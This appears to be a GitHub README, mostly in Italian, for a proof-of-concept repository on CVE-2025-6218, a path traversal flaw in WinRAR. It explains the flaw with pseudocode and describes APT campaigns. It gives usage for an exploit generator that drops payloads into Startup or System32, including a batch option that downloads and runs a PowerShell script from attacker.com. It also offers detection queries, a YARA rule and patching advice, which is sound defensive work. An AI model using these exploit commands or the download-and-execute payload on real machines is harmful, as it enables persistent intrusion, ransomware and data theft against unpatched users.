
Analisi completa e proof-of-concept per CVE-2025-6218 - vulnerabilità di path traversal RCE in WinRAR che interessa le versioni 7.11 e precedenti
⚠️ CRITICAL VULNERABILITY - Active Exploitation Confirmed
CVE-2025-6218 è una vulnerabilità critica di path traversal in WinRAR che permette l'esecuzione di codice arbitrario. Attualmente sfruttata da APT groups come GOFFEE, Bitter (APT-C-08) e Gamaredon.
CVE-2025-6218 è una vulnerabilità CRITICA di path traversal in WinRAR per Windows che consente agli attaccanti di eseguire codice arbitrario.
Un attaccante può:
WinRAR non valida correttamente i percorsi dei file all'interno di archivi .rar specializzati. Quando un utente estrae un archivio malformato, i file possono essere scritti in percorsi arbitrari al di fuori della cartella di estrazione prevista usando sequenze di path traversal (../ o ..\\).
// Pseudocodice - WinRAR v7.11 (VULNERABILE)
void extract_file(rar_entry *entry, char *dest_dir) {
char final_path[MAX_PATH];
strcpy(final_path, dest_dir); // "C:\\Temp\\"
strcat(final_path, entry->filename); // + "..\\..\\..\\Windows\\System32\\malware.exe"
// ❌ ERRORE: Nessuna validazione del path traversal!
// final_path = "C:\\Temp\\..\\..\\..\\Windows\\System32\\malware.exe"
// Risolto come: "C:\\Windows\\System32\\malware.exe" ← EXPLOIT!
create_file(final_path); // File creato in directory non intesa
}
dest_dir.. o .// WinRAR v7.12 (PATCHED)
bool is_path_contained(char *path, char *base_dir) {
char canonical[MAX_PATH], canonical_base[MAX_PATH];
// Normalizza entrambi i percorsi
GetFullPathName(path, MAX_PATH, canonical, NULL);
GetFullPathName(base_dir, MAX_PATH, canonical_base, NULL);
// Verifica contenimento
if (strncmp(canonical, canonical_base, strlen(canonical_base)) != 0) {
return false; // Path esce dalla directory base
}
return true;
}
void extract_file_safe(rar_entry *entry, char *dest_dir) {
char final_path[MAX_PATH];
strcpy(final_path, dest_dir);
strcat(final_path, entry->filename);
// ✅ FIX: Verifica che il file rimane dentro dest_dir
if (!is_path_contained(final_path, dest_dir)) {
skip_extraction(); // Rifiuta estrazione
log_error("Path traversal detected!");
return;
}
create_file(final_path); // Adesso sicuro
}
Cartella di Estrazione: C:\Temp\Extract
Path nel RAR (craft):
..\\..\\..\\..\\Users\\<user>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat
Risoluzione Path:
C:\\Temp\\Extract\\.. = C:\\Temp\\
C:\\Temp\\.. = C:\\
C:\\.. = C:\\ (non può andare oltre)
+ Users\\<user>\\...\\Startup\\payload.bat
= C:\\Users\\<user>\\AppData\\Roaming\\...\\Startup\\payload.bat ✓
┌─────────────────────────────────────────────┐
│ 1. Attaccante crea RAR con path craft │
│ es: ..\\..\\..\\Startup\\malware.bat │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 2. Distribuzione via spear-phishing │
│ Email mirata con allegato RAR │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 3. Vittima estrae archivio con WinRAR │
│ (versione ≤ 7.11) │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 4. WinRAR non valida path traversal │
│ File estratto in Startup folder │
└─────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────┐
│ 5. Al boot: payload eseguito │
│ RAT stabilisce C2 connection │
└─────────────────────────────────────────────┘
# Metodo 1: PowerShell
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Output:
# 7.11.0.0 → 🔴 VULNERABILE ⚠️
# 7.12.0.0 → 🟢 SAFE ✓
# Metodo 2: CMD
wmic datafile where name="C:\\\\Program Files\\\\WinRAR\\\\WinRAR.exe" get Version
# Metodo 3: GUI
# WinRAR → Help → About WinRAR → Verifica versione
Obiettivo: Governo, organizzazioni militari, istituzioni strategiche
Email Phishing:
From: [email protected]
Subject: "Provision of Information for Sectoral for AJK.rar"
Attachment: Provision_of_Information.rar
Contenuto Archive:
├── Document.docx (esca legittima - report convincente)
└── ..\\..\\..\\..\\Users\\User\\AppData\\Roaming\\Microsoft\\Office\\STARTUP\\Template.dotm
(macro malato nascosto)
Esecuzione:
1. Vittima estrae RAR
2. WinRAR non valida path → Template.dotm finisce in Office STARTUP
3. Prossimo avvio Word → Macro eseguita automaticamente
4. PowerShell downloader attivato
5. C# Trojan scaricato: WmRAT, MiyaRAT, ZxxZ
6. C2 Server: johnfashionaccess.com
7. Capabilities:
- Keylogging
- Screenshot capture
- RDP credential stealing
- File exfiltration
- Lateral movement
Obiettivo: Organizzazioni governative russe
RAR specializzato:
├── run.bat (path: ..\\..\\..\\..\\Windows\\Startup\\run.bat)
└── legitimate_document.pdf (esca)
Attack Chain:
1. Estrazione RAR → run.bat finisce in Startup
2. Al prossimo boot → run.bat eseguito
3. PowerShell script scarica stage 2
4. C# Custom Trojan installato
5. RAT stabilisce C2 persistente
6. Full system control achieved
RAR Weaponized:
└── locker.exe (path: ..\\..\\..\\Startup\\locker.exe)
Infezione:
1. Estrazione RAR
2. locker.exe → Startup folder
3. Sistema reboota (naturale o forzato)
4. locker.exe eseguito con diritti user
5. File system encryption
6. Ransom note displayed
7. Bitcoin payment richiesto
✅ Windows VM (10, 11, Server)
✅ WinRAR versione ≤ 7.11 installato
✅ Network isolato (no internet - safety first!)
✅ Snapshot VM per rollback
✅ Admin access per testing
# 1. Crea VM Windows pulita
# 2. Installa WinRAR 7.11
winget install RARLab.WinRAR --version 7.11
# 3. Verifica versione
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Output: 7.11.0.0 ✓
# 4. Disabilita network
Set-NetAdapter -Name "Ethernet" -Enabled $false
# 5. Crea snapshot
# VM → Snapshot → "Clean WinRAR 7.11 Vulnerable"
# 1. Clone questa repository
git clone https://github.com/Chrxstxqn/CVE-2025-6218-WinRAR-RCE-POC.git
cd CVE-2025-6218-WinRAR-RCE-POC
# 2. Genera exploit archive
python3 exploit/generate_rar.py \
--target startup \
--payload calc.exe \
--output exploit_poc.zip
# Output:
# [+] Target location: startup
# [+] Traversal path: ..\\..\\..\\..\\Users\\{user}\\AppData\\...\\Startup
# [+] Created: exploit_poc.zip
# 3. Trasferisci exploit_poc.zip su VM vulnerabile
# 4. Su VM target:
# - Right-click exploit_poc.zip
# - Extract to C:\
# - WinRAR estrae file
# 5. Verifica exploit success
ls "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
# Dovrebbe mostrare: calc.exe ← PATH TRAVERSAL RIUSCITO!
# 6. Reboot VM
shutdown /r /t 0
# 7. Al login: calc.exe eseguito automaticamente ✓
# Genera payload per Startup folder
python3 exploit/generate_rar.py --target startup --payload shell.bat
# Genera payload per System32 (richiede admin)
python3 exploit/generate_rar.py --target system32 --payload malware.exe
# Genera con custom batch command
python3 exploit/generate_rar.py \
--target startup \
--payload dropper.bat \
--batch "powershell -NoProfile -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
# Targets disponibili:
# - startup : Auto-execution at login
# - system32 : System directory (needs admin)
# - appdata : User AppData
# - documents : User Documents
# - temp : User Temp folder
# Monitor creazione file in Startup
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Recurse -File |
Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
# Check for suspicious Office templates
Get-ChildItem "$env:APPDATA\Microsoft\Office" -Include "*.dotm","*.xlsm" -Recurse |
Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
# Monitor System32 creation (requires admin)
Get-WinEvent -LogName Security -FilterXPath "*[EventData[Data[@Name='ObjectName'] and contains(., 'System32')]]" -MaxEvents 100
# Verifica processi in esecuzione da Startup
Get-WmiObject Win32_Process | Where-Object {
$_.ExecutablePath -like "*Startup*"
} | Select-Object Name, ExecutablePath, ProcessId
# Monitor WinRAR extraction con Sysmon (Event ID 11: File Created)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "*[System[EventID=11]] and *[EventData[Data[@Name='Image'] and contains(., 'WinRAR')]]" -MaxEvents 50
johnfashionaccess.com (Bitter/APT-C-08)
[additional IOCs from CISA KEV]
Subject patterns:
- "Provision of Information"
- "Sectoral for AJK"
- Government-related keywords
Senders:
- [email protected]
- Free email providers (Gmail, Outlook)
Attachments:
- .RAR files da external senders
- Legitimate-looking document names
rule CVE_2025_6218_WinRAR_PathTraversal {
meta:
description = "Detect RAR archives with path traversal sequences"
author = "Christian Schito"
date = "2025-12-15"
cve = "CVE-2025-6218"
strings:
$rar_sig = { 52 61 72 21 } // "Rar!" signature
$traversal1 = "..\\" ascii wide
$traversal2 = "../" ascii wide
$startup = "Startup" ascii wide nocase
$system32 = "System32" ascii wide nocase
condition:
$rar_sig at 0 and
(#traversal1 > 3 or #traversal2 > 3) and
($startup or $system32)
}
# Verifica versione attuale
$version = (Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
if ($version -le "7.11.0.0") {
Write-Host "🔴 VULNERABILE! Update richiesto!" -ForegroundColor Red
} else {
Write-Host "🟢 SAFE - Versione $version patched" -ForegroundColor Green
}
# Download WinRAR 7.12+
# https://www.rarlab.com/rar_add.htm
# Deploy aziendale (SCCM/Intune)
msiexec /i WinRAR-x64-721.msi /quiet /norestart
# Verifica post-update
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Dovrebbe essere ≥ 7.12.0.0
✅ Blocca .RAR da external domains
✅ Quarantine archives per deep scanning
✅ Content disarm and reconstruction (CDR)
✅ Sandboxing di allegati sospetti
✅ YARA rules per detection
# Scheduled task per monitoring
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-File C:\Scripts\monitor_startup.ps1'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 5)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "CVE-2025-6218 Monitor" -Description "Monitor Startup folder for suspicious files"
# Sysmon configuration
# Monitor Event ID 11 (File Created) in sensitive directories
✅ Separate admin workstations
✅ Block egress to known C2 domains
✅ Monitor for suspicious DNS queries
✅ Implement zero-trust network access
# AppLocker policy - Block execution from APPDATA\Startup
$rule = New-AppLockerPolicy -RuleType Path -Path "$env:APPDATA\*\Startup\*" -Action Deny -User Everyone
Set-AppLockerPolicy -PolicyObject $rule
✅ Non aprire archivi da email unknown
✅ Verify sender identity prima di aprire attachments
✅ Report suspicious emails al security team
✅ Keep software up-to-date
✅ Use sandboxed environment per file sospetti
CVE-2025-6218-WinRAR-RCE-POC/
├── README.md # Questa guida completa
├── LICENSE # MIT License
├── docs/
│ ├── TECHNICAL_ANALYSIS.md # Deep dive tecnico
│ ├── DETECTION.md # Forensics & IOC
│ ├── IOC_INDICATORS.md # Indicators of Compromise
│ └── SETUP.md # Lab setup guide
├── exploit/
│ ├── generate_rar.py # POC exploit generator (Python)
│ ├── CVE-2025-6218.bat # Batch script POC
│ └── README.md # Exploit usage guide
├── tools/
│ ├── detect.ps1 # Detection PowerShell script
│ ├── check_version.ps1 # Version checker
│ └── monitor_startup.ps1 # Startup folder monitor
└── samples/
├── yara_rules.yar # YARA detection rules
└── sysmon_config.xml # Sysmon configuration
⚠️ UTILIZZO ESCLUSIVAMENTE EDUCATIVO E DI RICERCA
Questo repository è fornito solo a scopi educativi e di ricerca di sicurezza autorizzata.
L'autore NON è responsabile per:
- Uso improprio di questo codice
- Danni causati da questo software
- Violazioni di legge commesse usando questo materiale
Usando questo repository, accetti di:
- Rispettare tutte le leggi applicabili
- Usare il codice solo per scopi legittimi
- Assumerti piena responsabilità delle tue azioni
Unauthorized access to computer systems is illegal. You have been warned.
MIT License - See LICENSE for details
Contributi benvenuti! Se hai:
Apri una Issue o Pull Request!
Author: Christian Schito
GitHub: @Chrxstxqn
Last Updated: December 15, 2025
Status: 🔴 Active Research - Exploitation Confirmed
⭐ Se questo repository ti è utile, lascia una stella! ⭐
🔒 Stay Safe. Patch Now. 🔒
| Aspetto | Dettaglio |
|---|
| CVSS Score | 7.8 (High) |
| Versioni Vulnerabili | WinRAR ≤ 7.11 (Windows only) |
| Piattaforme | Windows 10, 11, Server |
| Utenti Interessati | ~500 milioni |
| Patched In | WinRAR 7.12 (Giugno 2025) |
| Status | 🔴 Sfruttamento ATTIVO |
| CISA KEV | Aggiunto 9 Dicembre 2025 |
| Versione | Stato | Note |
|---|
| ≤ 7.10 | 🔴 VULNERABILE | Tutti gli exploit funzionano |
| 7.11 | 🔴 VULNERABILE | Ultima versione vulnerabile |
| 7.12 Beta 1+ | 🟢 PATCHED | Fix path traversal |
| 7.12+ | 🟢 PATCHED | Release stabile con fix |
| UNIX / Android | ✅ NOT AFFECTED | Versioni non-Windows non toccate |
| Data | Evento |
|---|
| Unknown | Vulnerability discovered |
| Giugno 2025 | RARLAB rilascia WinRAR 7.12 con patch |
| Luglio 2025 | GOFFEE (Paper Werewolf) inizia sfruttamento attivo |
| Agosto 2025 | BI.ZONE pubblica analisi tecnica dettagliata |
| Settembre 2025 | Bitter/APT-C-08 confermato in campagne spear-phishing |
| Novembre 2025 | Gamaredon sfruttamento confermato contro Ucraina |
| 9 Dicembre 2025 | 🔴 CISA aggiunge CVE-2025-6218 a KEV catalog |
| 30 Dicembre 2025 | Scadenza patch obbligatoria per agenzie federali USA |